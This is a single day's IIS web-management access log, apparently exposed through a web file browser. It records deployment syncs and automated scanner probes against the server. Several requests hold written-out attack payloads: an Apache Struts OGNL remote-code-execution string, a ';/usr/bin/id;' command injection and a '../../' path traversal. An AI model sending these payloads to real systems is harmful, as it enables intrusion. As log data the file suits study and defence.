????
Current Path : C:/inetpub/logs/wmsvc/W3SVC1/ |
Current File : C:/inetpub/logs/wmsvc/W3SVC1/ex241126.log |
#Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2024-11-26 00:51:55 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2024-11-26 00:51:55 103.153.214.94 GET /wp-content/plugins/kiwi-social-share/readme.txt - 8172 - 107.189.28.251 Mozilla/5.0+(X11;+CrOS+x86_64+14541.0.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/116.0.0.0+Safari/537.36 - 404 7 0 220 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2024-11-26 01:40:38 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2024-11-26 01:40:38 103.153.214.94 HEAD /msdeploy.axd Site=kiemkegpmb.gdtsolutions.vn 8172 - 119.82.130.75 - - 401 2 5 19 2024-11-26 01:40:38 103.153.214.94 HEAD /msdeploy.axd Site=kiemkegpmb.gdtsolutions.vn 8172 jenkins 119.82.130.75 - - 200 0 0 20 2024-11-26 01:40:38 103.153.214.94 HEAD /msdeploy.axd Site=kiemkegpmb.gdtsolutions.vn 8172 jenkins 119.82.130.75 - - 200 0 0 17 2024-11-26 01:40:38 103.153.214.94 POST /msdeploy.axd Site=kiemkegpmb.gdtsolutions.vn 8172 jenkins 119.82.130.75 MSDeployExe;sid=5b262d68-6a7c-4fa5-a52b-1c9aa271be0d;op=Sync - 200 0 0 494 2024-11-26 01:40:38 103.153.214.94 POST /msdeploy.axd Site=kiemkegpmb.gdtsolutions.vn 8172 jenkins 119.82.130.75 - - 200 0 0 608 2024-11-26 01:40:38 103.153.214.94 HEAD /msdeploy.axd Site=kiemkegpmb.gdtsolutions.vn 8172 jenkins 119.82.130.75 - - 200 0 0 9 2024-11-26 01:41:49 103.153.214.94 POST /msdeploy.axd Site=kiemkegpmb.gdtsolutions.vn 8172 jenkins 119.82.130.75 MSDeployExe;sid=5b262d68-6a7c-4fa5-a52b-1c9aa271be0d;op=Sync - 200 0 0 71140 2024-11-26 01:41:49 103.153.214.94 POST /msdeploy.axd Site=kiemkegpmb.gdtsolutions.vn 8172 jenkins 119.82.130.75 - - 200 0 0 71172 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2024-11-26 02:30:37 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2024-11-26 02:30:37 103.153.214.94 GET /premise/front/getPingData url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id; 8172 - 107.189.28.251 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/43.0.2357.124+Safari/537.36 - 404 7 0 221 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2024-11-26 03:10:43 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2024-11-26 03:10:42 103.153.214.94 GET / - 8172 - 147.185.133.142 Expanse,+a+Palo+Alto+Networks+company,+searches+across+the+global+IPv4+space+multiple+times+per+day+to+identify+customers'+presences+on+the+Internet.+If+you+would+like+to+be+excluded+from+our+scans,+please+send+IP+addresses/domains+to:+scaninfo@paloaltonetworks.com - 404 7 0 276 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2024-11-26 04:08:05 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2024-11-26 04:08:05 103.153.214.94 GET /wp-content/plugins/js-restaurant/readme.txt - 8172 - 107.189.28.251 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 210 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2024-11-26 05:47:38 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2024-11-26 05:47:38 103.153.214.94 GET /index.action redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D 8172 - 107.189.28.251 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+11_12)+AppleWebKit/618.17.9+(KHTML,+like+Gecko)+Version/17.4+Safari/618.17.9 - 404 7 0 260 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2024-11-26 07:22:45 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2024-11-26 07:22:44 103.153.214.94 GET /wp-content/plugins/booking-calendar-contact-form/readme.txt - 8172 - 107.189.28.251 Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:50.0)+Gecko/20100101+Firefox/50.0 - 404 7 0 310 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2024-11-26 08:57:13 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2024-11-26 08:57:13 103.153.214.94 GET /wp-content/themes/flashnews/style.css - 8172 - 107.189.28.251 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.13;+rv:70.0)+Gecko/20100101+Firefox/70.0 - 404 7 0 209 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2024-11-26 10:27:22 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2024-11-26 10:27:22 103.153.214.94 GET /wp-content/plugins/woocommerce-simple-registration/readme.txt - 8172 - 107.189.28.251 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.4.20 - 404 7 0 210 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2024-11-26 11:54:18 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2024-11-26 11:54:18 103.153.214.94 GET /terminals/1 - 8172 - 107.189.28.251 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/94.0.4606.81+Safari/537.36 - 404 7 0 208 2024-11-26 11:54:19 103.153.214.94 GET /terminals/2 - 8172 - 107.189.28.251 Mozilla/5.0+(Ubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 7 0 634 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2024-11-26 13:31:15 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2024-11-26 13:31:15 103.153.214.94 GET /wp-content/plugins/link-log/readme.txt - 8172 - 107.189.28.251 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.1+Safari/605.1.1+20.51 - 404 7 0 306 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2024-11-26 14:08:59 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2024-11-26 14:08:58 103.153.214.94 GET / - 8172 - 35.203.211.204 Expanse,+a+Palo+Alto+Networks+company,+searches+across+the+global+IPv4+space+multiple+times+per+day+to+identify+customers'+presences+on+the+Internet.+If+you+would+like+to+be+excluded+from+our+scans,+please+send+IP+addresses/domains+to:+scaninfo@paloaltonetworks.com - 404 7 0 337 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2024-11-26 14:26:16 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2024-11-26 14:26:16 103.153.214.94 HEAD /msdeploy.axd Site=kiemkegpmb.gdtsolutions.vn 8172 - 119.82.130.75 - - 401 2 5 13 2024-11-26 14:26:16 103.153.214.94 HEAD /msdeploy.axd Site=kiemkegpmb.gdtsolutions.vn 8172 jenkins 119.82.130.75 - - 200 0 0 117 2024-11-26 14:26:16 103.153.214.94 HEAD /msdeploy.axd Site=kiemkegpmb.gdtsolutions.vn 8172 jenkins 119.82.130.75 - - 200 0 0 27 2024-11-26 14:26:17 103.153.214.94 POST /msdeploy.axd Site=kiemkegpmb.gdtsolutions.vn 8172 jenkins 119.82.130.75 MSDeployExe;sid=34d90cbb-db44-49c9-8922-aa4eac5aa55d;op=Sync - 200 0 0 416 2024-11-26 14:26:17 103.153.214.94 POST /msdeploy.axd Site=kiemkegpmb.gdtsolutions.vn 8172 jenkins 119.82.130.75 - - 200 0 0 547 2024-11-26 14:26:17 103.153.214.94 HEAD /msdeploy.axd Site=kiemkegpmb.gdtsolutions.vn 8172 jenkins 119.82.130.75 - - 200 0 0 10 2024-11-26 14:27:22 103.153.214.94 POST /msdeploy.axd Site=kiemkegpmb.gdtsolutions.vn 8172 jenkins 119.82.130.75 MSDeployExe;sid=34d90cbb-db44-49c9-8922-aa4eac5aa55d;op=Sync - 200 0 0 64985 2024-11-26 14:27:22 103.153.214.94 POST /msdeploy.axd Site=kiemkegpmb.gdtsolutions.vn 8172 jenkins 119.82.130.75 - - 200 0 0 65020 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2024-11-26 15:04:59 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2024-11-26 15:04:59 103.153.214.94 HEAD /msdeploy.axd Site=kiemkegpmb.gdtsolutions.vn 8172 - 119.82.130.75 - - 401 2 5 16 2024-11-26 15:04:59 103.153.214.94 HEAD /msdeploy.axd Site=kiemkegpmb.gdtsolutions.vn 8172 jenkins 119.82.130.75 - - 200 0 0 32 2024-11-26 15:04:59 103.153.214.94 HEAD /msdeploy.axd Site=kiemkegpmb.gdtsolutions.vn 8172 jenkins 119.82.130.75 - - 200 0 0 85 2024-11-26 15:05:00 103.153.214.94 POST /msdeploy.axd Site=kiemkegpmb.gdtsolutions.vn 8172 jenkins 119.82.130.75 MSDeployExe;sid=ea4fa328-2bd7-45f4-8a25-c1cfc153db94;op=Sync - 200 0 0 540 2024-11-26 15:05:00 103.153.214.94 POST /msdeploy.axd Site=kiemkegpmb.gdtsolutions.vn 8172 jenkins 119.82.130.75 - - 200 0 0 889 2024-11-26 15:05:00 103.153.214.94 HEAD /msdeploy.axd Site=kiemkegpmb.gdtsolutions.vn 8172 jenkins 119.82.130.75 - - 200 0 0 11 2024-11-26 15:06:08 103.153.214.94 POST /msdeploy.axd Site=kiemkegpmb.gdtsolutions.vn 8172 jenkins 119.82.130.75 MSDeployExe;sid=ea4fa328-2bd7-45f4-8a25-c1cfc153db94;op=Sync - 200 0 0 67981 2024-11-26 15:06:08 103.153.214.94 POST /msdeploy.axd Site=kiemkegpmb.gdtsolutions.vn 8172 jenkins 119.82.130.75 - - 200 0 0 68020 2024-11-26 15:06:09 103.153.214.94 GET /wp-content/plugins/dokan-pro/readme.txt - 8172 - 107.189.28.251 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/16.6.1+Safari/605.1.15 - 404 7 0 214 2024-11-26 15:21:39 103.153.214.94 HEAD /msdeploy.axd Site=kiemkegpmb.gdtsolutions.vn 8172 - 119.82.130.75 - - 401 2 5 14 2024-11-26 15:21:39 103.153.214.94 HEAD /msdeploy.axd Site=kiemkegpmb.gdtsolutions.vn 8172 jenkins 119.82.130.75 - - 200 0 0 22 2024-11-26 15:21:39 103.153.214.94 HEAD /msdeploy.axd Site=kiemkegpmb.gdtsolutions.vn 8172 jenkins 119.82.130.75 - - 200 0 0 37 2024-11-26 15:21:39 103.153.214.94 POST /msdeploy.axd Site=kiemkegpmb.gdtsolutions.vn 8172 jenkins 119.82.130.75 MSDeployExe;sid=fea40904-a5d1-48cf-ba1a-999b31ee0be0;op=Sync - 200 0 0 389 2024-11-26 15:21:39 103.153.214.94 POST /msdeploy.axd Site=kiemkegpmb.gdtsolutions.vn 8172 jenkins 119.82.130.75 - - 200 0 0 455 2024-11-26 15:21:39 103.153.214.94 HEAD /msdeploy.axd Site=kiemkegpmb.gdtsolutions.vn 8172 jenkins 119.82.130.75 - - 200 0 0 10 2024-11-26 15:22:47 103.153.214.94 POST /msdeploy.axd Site=kiemkegpmb.gdtsolutions.vn 8172 jenkins 119.82.130.75 MSDeployExe;sid=fea40904-a5d1-48cf-ba1a-999b31ee0be0;op=Sync - 200 0 0 68280 2024-11-26 15:22:47 103.153.214.94 POST /msdeploy.axd Site=kiemkegpmb.gdtsolutions.vn 8172 jenkins 119.82.130.75 - - 200 0 0 68324 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2024-11-26 16:33:55 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2024-11-26 16:33:55 103.153.214.94 GET /InsightPluginShowGeneralConfiguration.jspa; - 8172 - 107.189.28.251 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:109.0)+Gecko/20100101+Firefox/117.0 - 404 7 0 219 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2024-11-26 18:05:46 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2024-11-26 18:05:46 103.153.214.94 GET /wp-content/plugins/flipbook/readme.txt - 8172 - 107.189.28.251 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.4.24 - 404 7 0 233 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2024-11-26 19:47:02 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2024-11-26 19:47:02 103.153.214.94 POST /UploadFile - 8172 - 107.189.28.251 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/90.0.4430.212+Safari/537.36 - 404 7 0 206 2024-11-26 19:47:03 103.153.214.94 GET /u8qx/tools/defaultviewer.jsp file=../../upload/gg.png 8172 - 107.189.28.251 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:104.0)+Gecko/20100101+Firefox/104.0 - 404 7 0 204 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2024-11-26 21:29:03 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2024-11-26 21:29:03 103.153.214.94 GET /wp-content/plugins/sem-wysiwyg/readme.txt - 8172 - 107.189.28.251 Mozilla/5.0+(ZZ;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 208 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2024-11-26 23:00:39 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2024-11-26 23:00:39 103.153.214.94 GET /wp-content/plugins/wp-all-import/readme.txt - 8172 - 107.189.28.251 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_12_6)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/103.0.0.0+Safari/537.36 - 404 7 0 230